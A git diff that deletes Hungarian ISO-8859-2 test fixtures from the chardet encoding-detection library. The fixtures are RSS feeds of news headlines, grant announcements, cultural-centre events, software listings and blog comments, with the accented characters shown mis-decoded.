utolsף bםrבlati idץpont az elץkיszםtץ lבtogatבs pבlyבzatokra vonatkozףan 2006. januבr 18., amely elץtt legkיsץbb 1 hיttel kell a pבlyבzatoknak beיrkeznik a Tempus Kצzalapםtvבny/ Leonardo Nemzeti Irodבhoz. Az elץkיszםtץ lבtogatבsok megvalףsםtבsבnak hatבrideje 2006. februבr 5.http://www.escience.hu/showitem.php?id=6772006.01.18 : Marie Curie kimenץ nemzetkצzi צsztצndםjakA pבlyבzat cיlja tapasztalt eurףpai kutatףk nemzetkצzi karrierjיnek, vilבgszםnvonalת 3. orszבgbeli intיzmיnynיl tצrtיnץ tovבbbkיpzיsיnek tבmogatבsa, majd annak elץsegםtיse, hogy a kutatף Eurףpבba visszatיrve a megszerzett tudבst valamely eurףpai fogadף intיzmיnyben alkalmazza. Ez az צsztצndםjtםpus a fentieknek megfelelץen kיt szakaszra tagolףdik: a.) kיpzיs a 3. orszבgban (1-2 יv) b.) kצtelezץ visszatיrיsi szakasz az EU-tagorszבgban vagy tבrsult orszבgban mkצdץ host intיzmיnybe.http://www.escience.hu/showitem.php?id=6812006.01.19 : Eurףpבn belli egyיni Marie Curie צsztצndםjakA kiםrt pבlyבzat cיlja az EU tagorszבgok יs a tבrsult orszבgok legםgיretesebb tapasztalt kutatףinak kיpzיse, karrierjיnek elץmozdםtבsa valamely mבs EU tagorszבgban vagy tבrsult orszבgban megvalףsםtandף kutatבsi projekt keretיben.http://www.escience.hu/showitem.php?id=6802006.01.20 : Szilבrd Leף Professzori ײsztצndםjA Magyary Zoltבn Felsץoktatבsi Kצzalapםtvבny Kuratףriuma az ALCOA Alapםtvבny rיsztבmogatבsבval (8000 USD) 2006-ban - az elmתlt hיt יvhez hasonlףan - hבrom "Szilבrd Leף Professzori ײsztצndםj"-at adomבnyoz. A dםjazott szemיlyיre בllami יs בllam בltal elismert magyar felsץoktatבsi intיzmיnyek tanבcsai tehetnek javaslatot Magyarorszבgon tevיkenykedץ oktatףk יs kutatףk kצrיbץl. A javasolt szemיlynek olyan vilבgszerte elismert eredmיnyt felmutatף tudףsnak kell lennie, aki szemיlyes tekintיlyיt iskolateremtץ felelץssיgיrzettel pבrosםtva segםti elץ fiatal munkatבrsai, egyetemi hallgatףi sikeres pבlyבjבt.http://www.escience.hu/showitem.php?id=6712006.01.20 : Oktatבsיrt Kצzalapםtvבny Kollיgiumfejlesztיsi Alkuratףrium pבlyבzataAz Oktatבsיrt Kצzalapםtvבny pבlyבzatot hirdet a felsץoktatבsi kollיgiumokban folyף szakmai יs tehetsיggondozבsi tevיkenysיg, tovבbbב kulturבlis יs sport programok tבmogatבsבra. A pבlyבzat cיlja a felsץoktatבsi kollיgiumokban folyף szakmai יs tehetsיggondozבsi tevיkenysיgek, valamint kulturבlis יs sport programok tבmogatבsa, a meglיvץ tevיkenysיgek feltיteleinek biztosםtבsבval יs תj kezdemיnyezיsek felkarolבsבval. Pבlyבzףk kצre: belfצldi szיkhely felsץoktatבsi kollיgiumok (צnבllף יs nem צnבllף gazdבlkodבsתak egyarבnt).http://www.escience.hu/showitem.php?id=6732006.01.24 : Kutatבsi יs Fejlesztיsi TanבcskozבsA Magyar Tudomבnyos Akadיmia Agrבr-Mszaki Bizottsבga 2006. januבr 24-25-יn, immבr 30. alkalommal rendezi meg Kutatבsi יs Fejlesztיsi Tanבcskozבsבt. A konferencia helyszםne: Szent Istvבn Egyetem, Gצdצllץ. A tanבcskozבson elhangzott elץadבsokat, ill. a konzultבciףs tיmבk teljes terjedelm dolgozatait gyjtemיnyes kiadבsban jelentetik meg a tanבcskozבst kצvetץen.http://www.escience.hu/showitem.php?id=6862006.01.25 : Bologna szeminבrium: Vבllalati kapcsolatok - kיpzץk יs munkבltatףk szerepe az תj felsץoktatבsi szerkezet fejlesztיsיbenA Bologna Tanבcsadף Hבlףzat tevיkenysיgיnek keretיben megrendezzk soron kצvetkezץ Bologna szeminבriumunkat Vבllalati kapcsolatok - kיpzץk יs munkבltatףk szerepe az תj felsץoktatבsi szerkezet fejlesztיsיben cםmmel. A szeminבrium keretיben lehetץsיget adunk a felsץoktatבsi intיzmיnyek יs munkבltatףk vיlemיnycserיjיre az Eurףpai Kיpesםtיsi Keret 2006-os bevezetיse, illetve a kimeneti kצvetelmיnyek meghatבrozבsa kapcsבn. A dיlelץtti szekciףban vitaindםtף elץadבsokat gyjtצttnk צssze a tיma sarkalatos pontjainak megismerיsיre, kצrljבrבsבra. Az elץadבsokat kצvetץen kerekasztal-beszיlgetיsek formבjבban hallgatjuk meg felkיrt beszיlgetץ partnereink יs a rיsztvevץk vיlemיnyיt, javaslatait az egyes dיlutבni szekciףkban.http://www.escience.hu/showitem.php?id=6782006.01.25 : Marie Curie tבmogatבs kivבlף kutatףcsoportoknakA pבlyבzat cיlja a kiemelkedץen tehetsיges, karrierjknek viszonylag kezdeti szakaszבban jבrף kutatףk tבmogatבsa, hogy vezetיskkel kivבlף nemzetkצzi kutatףcsoportok jצjjenek lיtre, amelyek az EU tבmogatבssal viszonylag rצvid id&#245;n bell kיpesek lehetnek sajבt terletkצn kivבlף eredmיnyek elיrיsיre. A kutatבsi tיma szempontjבbףl prioritבst יlveznek az EU versenykיpessיge szempontjבbףl kiemelkedץen fontos kutatבsi terletek, interdiszciplinבris terletek.http://www.escience.hu/showitem.php?id=6822006.01.27 : Humבn erץforrבs fejlesztיse a civil szektorbanA Magyary Zoltבn Felsץoktatבsi Kצzalapםtvבny kuratףriuma יs a Civil Tבrsadalomיrt Alapםtvבny צsztצndםjpבlyבzatot hirdet "Humבn erץforrבs fejlesztיse a civil szektorban" cםmmel. A pבlyבzat a Nemzeti Civil Alapprogram tבmogatבsבval kerl meghirdetיsre. Az צsztצndםj elnyerיsיre olyan szemיlyek pבlyבzhatnak, akik a hazai civil szektor hatיkonyabb mkצdיsיt elץsegםtץ tיmבkbףl kיszםtik -szakdolgozatukat vagy doktori יrtekezיsket. Pבlyבzhatnak tovבbbב azok az oktatףk, kutatףk, akik kutatףmunkבjukat a hazai civil szektor hatיkonyabb mkצdיsיt elץsegםtץ tיmבkban vיgzik.http://www.escience.hu/showitem.php?id=6702006.01.31 : Ifjתsבgi Nemzetkצzi Konferencia PבlyבzatA Magyar Tudomבnyos Akadיmia a kezelיsיre bםzott magבnalapםtvבny felhasznבlבsבval "Ifjתsבgi Nemzetkצzi Konferencia Pבlyבzat" lיtrehozבsבval tבmogatni kםvבnja a fiatal magyar tudomבnyos kutatףk nemzetkצzi tudomבnyos rendezvיnyeken valף rיszvיtelיt. A vissza nem tיrםtendץ tבmogatבs legmagasabb צsszege 150 000 Ft, יs a nemzetkצzi tudomבnyos konferenciבk rיszvיteli kצltsיgeinek (rיszvיteli dםj, תtikצltsיg, szבllבskצltsיg) fedezetיl hasznבlhatף fel.http://www.escience.hu/showitem.php?id=6302006.01.31 : Oktatבsיrt Kצzalapםtvבny OKTK Alkuratףrium pבlyבzataAz Oktatבsיrt Kצzalapםtvבny Orszבgos Kiemelיs Tבrsadalomtudomבnyi Kutatבsok Alkuratףriuma pבlyבzatot hirdet tבrsadalomtudomבnyok kצrיbe vבgף, elsץsorban olyan kצzpolitikai tudomבnyos kutatבsok tבmogatבsבra, amelyek az oktatבst segםtik. Az alבbbi tיmבkban lehet a pבlyבzatot beadni: kצz- יs felsץoktatבs; esיlyegyenlץsיg; ifjתsבg; -csalבd יs szocializבciף, demogrבfiai folyamatok; etnikai, vallבsi, kulturבlis, יletforma kisebbsיgek. A pבlyבzati kiםrבst keretצsszege: 45 milliף forint. Az igיnyelhetץ tבmogatבs maximum צsszege: 5 milliף forint.http://www.escience.hu/showitem.php?id=6722006.02.01 : Comenius: nyelvtanבr-asszisztensi צsztצndםjakA Socrates / Comenius nyelvtanבr-asszisztensi akciף keretיben leendץ nyelvtanבrok az Uniף egyik tagבllamבnak valamely kצzoktatבsi intיzmיnyיben 3-8 hףnap idץtartamת tanבrasszisztensi megbםzבst nyerhetnek el a 2006/2007-os tanיvre. E tevיkenysיg rendszerint olyan orszבgban zajlik, ahol a tanבrjelצlt בltal a kיsץbbiekben tanםtani kםvבnt nyelv idegen nyelvnek szבmםt. A tanבrasszisztensi program kיt fץ cיlja, hogy a leendץ nyelvtanבrok lehetץsיget kapjanak nyelvi, kulturבlis יs pedagףgiai ismereteik bץvםtיsיre, valamint a fogadף intיzmיnyek hasznosםtsבk az idegen anyanyelv asszisztensek munkבjבt יs ismereteit.http://www.escience.hu/showitem.php?id=6752006.02.03 : FairPrint 2006, XI. Orszבgos Konferencia יs Kiבllםtבs a szבmםtבstechnika nyomdai alkamazבsבrףlEzתton tבjיkoztatjuk, hogy FairPrint 2006 cםmmel orszבgos konferenciבt szerveznk a szבmםtבstechnika nyomdai alkalmazבsבrףl. A rendezvיnyen felkיrt elץadףk יs szabad elץadבsok rיvיn alkalmat kםvבnunk teremteni ahhoz, hogy a nyomdבsz szakemberek a kezdץtץl a professzionבlis szintig megismerhessיk, a hardver(ek) יs szoftver(ek) hogyan lehetnek segםtsיgkre a mindennapi munka sorבn. Felkיrt fץvיdnצkצk: Magyar Nyomda- יs Papםripari Szakmai Szצvetsיg; -Papםr- יs Nyomdaipari Mszaki Egyeslet.http://www.escience.hu/showitem.php?id=6642006.02.15 : X. Orszבgos Felsץoktatבsi Kצrnyezettudomבnyi DiבkkonferenciaA Kצrnyezetvיdelmi יs Vםzgyi Minisztיrium יs az Oktatבsi Minisztיrium, a kצrnyezeti oktatבsban יrdekelt Fצldmvelיsgyi יs Vidיkfejlesztיsi Minisztיrium kצzremkצdיsיvel, valamint a Magyar Tudomבnyos Akadיmia יs mבs intיzmיnyek, szervezetek tבmogatבsבval 2006-ban megrendezi a X. Orszבgos Felsץoktatבsi Kצrnyezettudomבnyi Diבkkonferenciבt (X. OFKD). A rendezvיny hבzigazdבja az Eszterhבzy Kבroly Fץiskola Termיszettudomבnyi Fץiskola Kara, Fץvיdnצke a Kצrnyezetvיdelmi יs Vםzgyi Miniszter יs az Oktatבsi Miniszter.http://www.escience.hu/showitem.php?id=6562006.02.21 : Magyarregula 2006A rendezvיny tematikבja magבban foglalja az ipari automatizבlבs, labor יs terepi mszerezיs, folyamatirבnyםtבs, technolףgiai, karbantartבsi יs termelיsi irבnyםtבsi szoftverek az alבbbi iparבgak szבmבra: Olajipar, Vegyipar, Gyףgyszeripar, Energiatermelיs יs elosztבs, Cellulףz יs Papםripar -Gיpipar, Fיmipar, ֹlelmiszeripar, ֹpםtץipar, Kצrnyezetvיdelem, Vםz יs Szennyvםztisztםtף Ipar, Tבvkצzlיs יs Hםradבstechnika, Jבrmipar.http://www.escience.hu/showitem.php?id=645 \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/hirtv.hu.xml b/chardet/tests/iso-8859-2-hungarian/hirtv.hu.xml deleted file mode 100644 index 76974e7..0000000 --- a/chardet/tests/iso-8859-2-hungarian/hirtv.hu.xml +++ /dev/null @@ -1,104 +0,0 @@ - - - - - - - -HםrTV -http://www.hirtv.hu/ -HםrTV -hu -Wed, 04 Jan 2006 17:51:32 +0100 - - HםrTV - http://www.hirtv.hu/_i/logo.gif - http://www.hirtv.hu/ - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78694 -<![CDATA[USD-CHF Shortok megszntetיse]]> - - -http://www.hirtv.hu/?tPath=/belfold/kek_hirek/&article_hid=78692 -<![CDATA[Csalבdi tragיdiבt okozott a talבlt mיreg]]> - - -http://www.hirtv.hu/?tPath=/belfold/&article_hid=78690 -<![CDATA[Jelentץs בrhullבmra szבmםtanak Somogyban]]> - - -http://www.hirtv.hu/?tPath=/tud-tech/&article_hid=78687 -<![CDATA[Egy תjabb Mount Everest]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78689 -<![CDATA[GBP-USD Az 1,7600-os יrtיk a lבthatבron]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78686 -<![CDATA[EUr-USD Nיmi csצkkenיs a beיrkezett megrendelיsek utבn]]> - - -http://www.hirtv.hu/?tPath=/kulfold/&article_hid=78684 -<![CDATA[Leszakadt vezetיkek, energetikai szksיgבllapot]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78681 -<![CDATA[ֱtmenetileg csצkkenצ aranyבr]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78682 -<![CDATA[Amerikai iparba beיrkezett megrendelיsek: +2,5%- elצrejelzיs. 2,4%]]> - - -http://www.hirtv.hu/?tPath=/belfold/kek_hirek/&article_hid=78677 -<![CDATA[ױrjצngץ nץ zaklatta a lakףkat]]> - - -http://www.hirtv.hu/?tPath=/belfold/&article_hid=78676 -<![CDATA[Feloldottבk a hףlבnc-kצtelezettsיget -]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78675 -<![CDATA[EUR-PLN Lubinska: Nem problיma a zloty erצssיge]]> - - -http://www.hirtv.hu/?tPath=/kultura/film/&article_hid=78672 -<![CDATA[Tצbb mint szבz dםj יs elismerיs a magyar filmeknek]]> - - -http://www.hirtv.hu/?tPath=/rss2/&article_hid=78669 -<![CDATA[Leszתrta nevelץapjבt egy 11 יves kisfiת]]> - - -http://www.hirtv.hu/?tPath=/belfold/kek_hirek/&article_hid=78668 -<![CDATA[Fagyבllף a vצrצsborban]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78670 -<![CDATA[EUR-USD Constancio nyilatkozata]]> - - -http://www.hirtv.hu/?tPath=/kulfold/&article_hid=78664 -<![CDATA[32 ezer baromfi pusztult el a Krםm-fיlszigeten]]> - - -http://www.hirtv.hu/?tPath=/sport/&article_hid=78662 -<![CDATA[jabb magyar baleset a Dakaron]]> - - -http://www.hirtv.hu/?tPath=/belfold/&article_hid=78657 -<![CDATA[Diבkigazolvבnyok: תj kצzbeszerzיsi pבlyבzat]]> - - -http://www.hirtv.hu/?tPath=/gazdasag/penzpiac/&article_hid=78658 -<![CDATA[USD-CAD Csצkkenצ kanadai termelצi בrak]]> - - - \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/honositomuhely.hu.xml b/chardet/tests/iso-8859-2-hungarian/honositomuhely.hu.xml deleted file mode 100644 index bb0cd29..0000000 --- a/chardet/tests/iso-8859-2-hungarian/honositomuhely.hu.xml +++ /dev/null @@ -1,74 +0,0 @@ - - - - - - Broadcast Builder 1.48 Personal (C) Lionhardt Technologies 2003, www.lionhardt.com/bb - Wed, 04 Jan 2006 07:50:10 GMT - Honosםtף Mhely : Legfrissebb verziףk - http://www.honositomuhely.hu/ - - hu - Copyright (C) 2006 Herczeg Jףzsef Tamבs - Wed, 04 Jan 2006 07:50:10 GMT - - Simply Calenders 4.5 (d) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=911&parent=folder - Wed, 04 Jan 2006 07:50:05 GMT - - gyvitel - - - PDF Download 0.6 (fw) (J) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=939&parent=folder - Wed, 04 Jan 2006 07:07:01 GMT - - Internet - - - VideoInspector 1.8.1.96 (fw) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=737&parent=folder - Wed, 04 Jan 2006 07:06:30 GMT - - Multimיdia - - - AnyDVD 5.7.3.1 (sw) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=91&parent=folder - Wed, 04 Jan 2006 07:06:38 GMT - - Multimיdia - - - Archivarius 3000 3.41 (sw) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=94&parent=folder - Wed, 04 Jan 2006 07:06:42 GMT - - Segיdprogramok - - - Magic Tweak 3.20 (sw) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=464&parent=folder - Wed, 04 Jan 2006 07:06:46 GMT - - Segיdprogramok - - - RailGeoGraph.NET 2.2 (fw) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=834&parent=folder - Wed, 04 Jan 2006 07:06:49 GMT - - Otthon/Oktatבs - - - WinPIM 8.10.1540 (sw) (fr) - http://www.honositomuhely.hu/index.php?option=com_remository&Itemid=1&func=fileinfo&filecatid=779&parent=folder - Wed, 04 Jan 2006 07:06:53 GMT - - gyvitel - - - diff --git a/chardet/tests/iso-8859-2-hungarian/saraspatak.hu.xml b/chardet/tests/iso-8859-2-hungarian/saraspatak.hu.xml deleted file mode 100644 index 2ee425c..0000000 --- a/chardet/tests/iso-8859-2-hungarian/saraspatak.hu.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - -A Mvelץdיs Hבza - Sבrospatak -http://www.sarospatak.hu/muvhaz/ -A Mvelץdיs Hבza havi programja -hu -Copyright 2003-2005 A Mvelץdיs Hבza - Sבrospatak; http://www.sarospatak.hu/muvhaz/ -Sבrospataki nyבri programajבnlף - PATAKI NYֱR 2005 -http://www.sarospatak.hu/muvhaz/index.php# - -Sבrospataki nyבri programajבnlף -]]> - - -ILYEN MֹG NEM VOLT IV. -http://www.sarospatak.hu/muvhaz/index.php#1 - -
    - 17.00 ףrבtףl -]]> -
    -
    -CINEMA FILMKLUB -http://www.sarospatak.hu/muvhaz/index.php#5 - -Finnorszבg: A MLT NֹLKLI EMBER

    [Illusztrבciף: A MLT NֹLKLI EMBER]R.: Aki Kaurismaki
    Sz.: Markku Peltola, Kati Outinen

    - 18.00 ףrבtףl
    Belיpץdםj 200 Ft



    -]]> -
    -
    -KOMOLYZENEI KLUB -http://www.sarospatak.hu/muvhaz/index.php#8 - -
    [Illusztrבciף: Beethoven]Vezetץnk יs beszיlgetץ partnernk: Magyar Kornיl a Bartףk Rבdiף vezetץ szerkesztץje
    - 18.00 ףrבtףl






    -]]> -
    -
    -A FARKAS FERENC MVֹSZETI ISKOLA -http://www.sarospatak.hu/muvhaz/index.php#11 - -
    - 10.40 ףrבtףl -]]> -
    -
    -FORR׃ VIZET A KOPASZRA! -http://www.sarospatak.hu/muvhaz/index.php#12 - -egri BABSZEM JANK׃ GYERMEKSZֽNHֱZ elץadבsבban

    - 14.00 ףrבtףl
    Belיpץdםj: 250 Ft
    -]]> -
    -
    -A FARKAS FERENC MVֹSZETI ISKOLA -http://www.sarospatak.hu/muvhaz/index.php#12 - -
    - 17.00 ףrבtףl -]]> -
    -
    -SֱROSPATAKI KײZOKTATֱSI ELLֱTֱSI KײRZET SZAKMAI NAPJA -http://www.sarospatak.hu/muvhaz/index.php#15 - - - - -SZֽNHֱZI BֹRLETES ELױADֱS -http://www.sarospatak.hu/muvhaz/index.php#19 - -operett
    Leblanc Gyץzץ Produkciףs Iroda szervezיsיben

    [Illusztrבciף: Lili bבrףnץ]Huszka Jenץ legkצzismertebb dalait hallhatjבk a Lili bבrףnץben. A primadonna יs a bonvivבn, Lili יs Illיshבzy Lבszlף – akik egyיbkיnt יlץ szemיlyek voltak – andalםtף dallamait ritmusos szubrett יs tבncoskomikus szבmok vבltjבk fel. Ehhez jצn mיg kיt idץsצdץ vיnlבny rokon יs Lili festיkkereskedץ apja, akik humoros jeleneteikkel fergeteges hangulatתvב teszik az elץadבst.

    Fץbb szerepekben: Szףka Jתlia, Leblanc Gyץzץ, Kovבcs Zsuzsa, Bozsף Jףzsef

    - 19.00 ףrakor
    Belיpץ: 1500 Ft, diבk יs nyugdםjas jegy:1000 Ft
    -]]> -
    -
    -MAGֱN MVֹSZETI ISKOLֱK V. NֹPTֱNC FESZTIVֱLJA -http://www.sarospatak.hu/muvhaz/index.php#23 - -- Zemplיn Gyermekcsoport Cigבnd
    - Rozmaring Gyermekcsoport Mezץkצvesd
    - Gyצngyvirבg Gyermekcsoport Mezץkצvesd
    - Kutyatץk Gyermekcsoport Tiszaתjvבros
    - Tiszavirבg Gyermekssoport Tiszaתjvבros
    - Dati Kisszinvavצlgyi Tבncmhely Miskolc
    - Borockבs Gyermekcsoport Tiszaתjvבros
    - Bokrיta Mvיszeti Iskola Sבtoraljaתjhely
    - Sבrospataki Tבncmvיszeti Iskola csoportjai

    Rendezץ: Sבrospataki Tבncmvיszeti Iskola

    - 14.00 ףrבtףl -]]> -
    -
    -MAGYARORSZֱG 1000 ֹVE TֹRKֹPEKEN -http://www.sarospatak.hu/muvhaz/index.php#24 - -MAGYARORSZֱG 1000 ֹVE TֹRKֹPEKEN c. kiבllםtבs
    A Mvelץdיs Hבza Galיriבjבban 16.00 ףrבtףl

    Kצszצntץt mond: Dr. Kupa Mihבly, ZTSZ צrצkצs tiszteletbeli elnצke

    A kiבllםtבst megnyitja: Dr. Mihalik Jףzsef mיrnצk-alezredes

    -]]> -
    -
    -A HELY, AHOL ֹLNK SOROZAT -http://www.sarospatak.hu/muvhaz/index.php#27 - -ZEMPLֹN NֹPRAJZI ֹRTֹKEI


    Ea.: Darmos Istvבn nיprajzkutatף

    E terleten vבltozatos nיprajzi יrtיkekrץl beszיlhetnk, akבr a szellemi mveltsיget, akבr a tבrgyalkotף nיpmvיszetet, akבr a tבrsadalom-nיprajzi kיrdיseket vizsgבljuk. Vannak olyan terletek, amelyekkel kutatףink kevיsbי foglalkoztak. Ezekrץl a kיrdיsekrץl יs a felhalmozףdott tudבs hasznosםtבsבrףl lesz szף.

    - Belיpץdםj: 300 Ft

    - 18.00 ףrבtףl -]]> - - -KIRֱNDULֱS KֱRPֱTALJֱRA -http://www.sarospatak.hu/muvhaz/index.php# - -
    A Mvelץdיs Hבza szervezיsיben mבjus 27-29-ig.
    Irבnyבr: 21.900 Ft

    Jelentkezni lehet: Stumpf Gבbor nיpmvelץnיl -]]> -
    -
    -TֱBOROZֱSI FELHֽVֱS -http://www.sarospatak.hu/muvhaz/index.php# - -2005. jתnius 20-24. kצzצtt rendezi a
    PATAKI FAZEKAS KISINASOK TֱBORֱT
    Sבrospatakon a kispataki Alkotףhבzban.

    Kיrjk rיszvיteli szבndיkבt jתnius 1-ig jelezze.
    ֹrdeklץdיs יs felvilבgosםtבs Kovבcsnי Gיczi Julianna nיpmvelץnיl.

    A Mvelץdיs Hבza 2005. augusztus 8-12. kצzצtt rendezi a
    NֹPI JֱTSZ׃HֱZVEZETױK III. TOVֱBBKֹPZױ TֱBORֱT
    Sבrospatakon a kispataki Alkotףhבzban.

    Kיrjk rיszvיteli szבndיkבt jתlius 20-ig jelezze.

    ֹrdeklץdיs יs felvilבgosםtבs Kovבcsnי Gיczi Julianna nיpmvelץnיl.
    -]]> -
    -
    \ No newline at end of file diff --git a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mk.xml b/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mk.xml deleted file mode 100644 index f73ddd0..0000000 --- a/chardet/tests/iso-8859-2-hungarian/shamalt.uw.hu.mk.xml +++ /dev/null @@ -1,163 +0,0 @@ - - - - - sHaMaLt bLOG - Hozzבszףlבsok - http://shamalt.uw.hu/index.php - Ti mondtבtok. - hu - Nox v2.2 - Copyright 2003-2006, sHaMaLt - shamalt@shamalt.tk (sHaMaLt) - - http://shamalt.uw.hu/pic/rss_wap_blog.gif - sHaMaLt bLOG - http://shamalt.uw.hu/index.php - - 5 - http://blogs.law.harvard.edu/tech/rss - - sHaMaLt, ma, 14:11 (Csak szex יs mבs semmi) - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi#komment_4348 - meg fogom nezni. viszont ki mondta, hogy a zimmer atdolgozas? ;) - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi#komment_4348 - Wed, 04 Jan 2006 14:11:07 +0100 - - - admc, ma, 14:09 (Csak szex יs mבs semmi) - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi#komment_4347 - A Zimmer Feri nem בtdolgozבs, ezיrt aztבn kצnnyebb is jףnak lennie, szerintem is nagyszer, nיzd meg! - http://shamalt.uw.hu/index.php?d=657/csak-szex-es-mas-semmi#komment_4347 - Wed, 04 Jan 2006 14:09:09 +0100 - - - smv, ma, 13:51 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4346 - Most יppen egy sincs. :) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4346 - Wed, 04 Jan 2006 13:51:50 +0100 - - - sHaMaLt, ma, 13:03 (Urlx) - http://shamalt.uw.hu/index.php?d=661/urlx#komment_4345 - megkonnyiti az azonositast. mondjuk ha a munkahelyeden az egyik kollegadtol kapsz egy url-t, es eppen mogotted van a fonok, akkor ha latod, hogy a linkben szerepel peldanak okaert a kutyaszex.freeblog.hu oldal, akkor nem nyitod meg :P - http://shamalt.uw.hu/index.php?d=661/urlx#komment_4345 - Wed, 04 Jan 2006 13:03:53 +0100 - - - Balבzs, ma, 13:03 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4344 - Meg persze a tavaszi sznet, nyבri sznet, ץszi sznet, tיli sznet, ilyen sznet, olyan sznet. - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4344 - Wed, 04 Jan 2006 13:03:25 +0100 - - - Balבzs, ma, 13:01 (Urlx) - http://shamalt.uw.hu/index.php?d=661/urlx#komment_4343 - Belfצldצn meg ugye itt van a href.hu, nekem az jobban bejצn ennיl. Nem יrtem, hogy egy rצvid <acronym title="Uniform Resource Locator">URL</acronym>-be minek belevenni az eredeti domaint, alkalmankיnt ezבltal sokkal hosszabb lesz a kapott link, mint amilyen az eredeti. Mיg jף, hogy kikapcsolhatף. - http://shamalt.uw.hu/index.php?d=661/urlx#komment_4343 - Wed, 04 Jan 2006 13:01:45 +0100 - - - Gazala, ma, 13:01 (Typetester) - http://shamalt.uw.hu/index.php?d=660/typetester#komment_4342 - Ezt a cuccot egy ideje ismerem :) - http://shamalt.uw.hu/index.php?d=660/typetester#komment_4342 - Wed, 04 Jan 2006 13:01:18 +0100 - - - smv, ma, 12:57 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4341 - A google adsense 4 jegy צsszege is tצkיletes lenne, csak tudjam belץle kifizetni a cuccot. Ennyi lenne a reklבmokkal csak a cיlom, hogy צnfenntartף legyen az oldal. :) <br /> <br /> A screenshotos dolog tיnyleg jף 5let. :D <br /> <br /> ֹs azיrt annyira nincsen sok idץm... Reggel 7:30 -ra suliba kell lenni, 15ףrבig בlltalבban suli van, utבnna zenesuliba megyek pluszba az mיg kיt ףra (modnjuk nem mindennap), hazavergץdצm 6-7 kצrl, tanulni egy kicsit, 8 ףra, יs van rב kיt ףrבm, hogy 1-1 dolgot megcsinבljak, akkor amikor mבr lבtni se lבtok. :D <br /> <br /> Ha pedig tיynleg segםtetek a dizבjnban (suexID), akkor az nagyon nagyon jףl jצnne. - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4341 - Wed, 04 Jan 2006 12:57:16 +0100 - - - sHaMaLt, ma, 12:37 (Typetester) - http://shamalt.uw.hu/index.php?d=660/typetester#komment_4340 - ez most del.icio.us volt, de jokat ir meg a <a href="http://techcrunch.com">Techcrunch</a> es a <a href="http://crunchnotes.com">Crunchnotes</a> is, es erdekes linkeket kuldenek a Weblabor linkfalra is, meg neha a sztahanovot is olvasom, bar egyre ritkabban. - http://shamalt.uw.hu/index.php?d=660/typetester#komment_4340 - Wed, 04 Jan 2006 12:37:24 +0100 - - - Haszprus, ma, 12:33 (Typetester) - http://shamalt.uw.hu/index.php?d=660/typetester#komment_4339 - te milyen forrבsokbףl szeded ezeket a szolgבltatבsokat? - http://shamalt.uw.hu/index.php?d=660/typetester#komment_4339 - Wed, 04 Jan 2006 12:33:26 +0100 - - - Levente, ma, 12:15 (The Web 2.0 Quiz) - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz#komment_4338 - 5/10. Azaz csak fיlig vagyok webkettץpontnullבs, tehבt webegypontnullבs vagyok :) - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz#komment_4338 - Wed, 04 Jan 2006 12:15:26 +0100 - - - sHaMaLt, ma, 11:39 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4337 - hm, mostanaban egyebkent is sokat nezek hatra a vallam folott, h nem kovet-e vki :D <br /> egyebkent meg a kika es szoba johet lampak szempontjabol - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4337 - Wed, 04 Jan 2006 11:39:57 +0100 - - - Haszprus, ma, 11:31 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4336 - Nem volt cinizmus a web2.0-s pיldבmban, mindenfיle hבttיrsejtיs kizבrףlag az ײn paranoid agyszlemיnye :) <br /> <br /> Autף nem valףszםn de azיrt thx a tippet :) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4336 - Wed, 04 Jan 2006 11:31:25 +0100 - - - Balבzs, ma, 11:27 (Blogsearch.hu) - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4335 - Mיlcםmet ne tartalmazzon. - http://shamalt.uw.hu/index.php?d=658/blogsearch.hu#komment_4335 - Wed, 04 Jan 2006 11:27:29 +0100 - - - sHaMaLt, ma, 11:27 (The Web 2.0 Quiz) - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz#komment_4334 - ב, via Crunchnotes es delicious, sztahanov mostanaban engem nem annyira erdeklo dolgokrol ir. :) - http://shamalt.uw.hu/index.php?d=659/the-web-2.0-quiz#komment_4334 - Wed, 04 Jan 2006 11:27:21 +0100 - - - sHaMaLt, ma, 11:25 